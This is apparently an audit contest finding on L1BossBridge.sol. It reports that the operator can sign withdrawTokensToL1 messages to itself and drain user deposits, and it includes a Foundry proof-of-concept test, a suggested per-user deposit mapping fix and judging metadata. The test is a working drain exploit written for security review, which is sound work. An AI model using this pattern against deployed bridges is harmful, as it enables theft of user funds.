Submission Details
Severity:
L1BossBridge.sol - withdrawTokensToL1 - Operator could potentially Rug users
Summary
The operator being the one signing the message withdrawTokensToL1 he could potentially change the 'to' and 'amount' and rug the vault
Vulnerability Details
function testOperatorRug() public {
uint256 largeApprove = 100e18;
uint256 depositAmount = 10e18;
// Users deposit a large amount
vm.startPrank(user);
token.balanceOf(address(user));
token.approve(address(tokenBridge), largeApprove);
tokenBridge.depositTokensToL2(user, userInL2, largeApprove);
vm.stopPrank();
// Just showcase that the operator can rug, he could potentially take all the L1 token at once
vm.startPrank(operator.addr);
(uint8 v, bytes32 r, bytes32 s) = _signMessage(_getTokenWithdrawalMessage(operator.addr, depositAmount), operator.key);
tokenBridge.withdrawTokensToL1(operator.addr, depositAmount, v, r, s);
(uint8 v2, bytes32 r2, bytes32 s2) = _signMessage(_getTokenWithdrawalMessage(operator.addr, depositAmount), operator.key);
tokenBridge.withdrawTokensToL1(operator.addr, depositAmount, v2, r2, s2);
vm.stopPrank();
assertEq(token.balanceOf(operator.addr), depositAmount * 2);
}
Impact
Even if it's known that the protocol is centralised it should not be possible for the project owner to rug the project
Tools Used
Forge test
Recommendations
Add a mapping with the amount deposited per user to avoid malicious actors withdrawing for users without deposit
Updates
Lead Judging Commences
0xnevi almost 2 years ago
Submission Judgement Published Assigned finding tags:
withdrawTokensToL1(): No check for deposits amount
Rewards breakdown
nSLOC
99This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.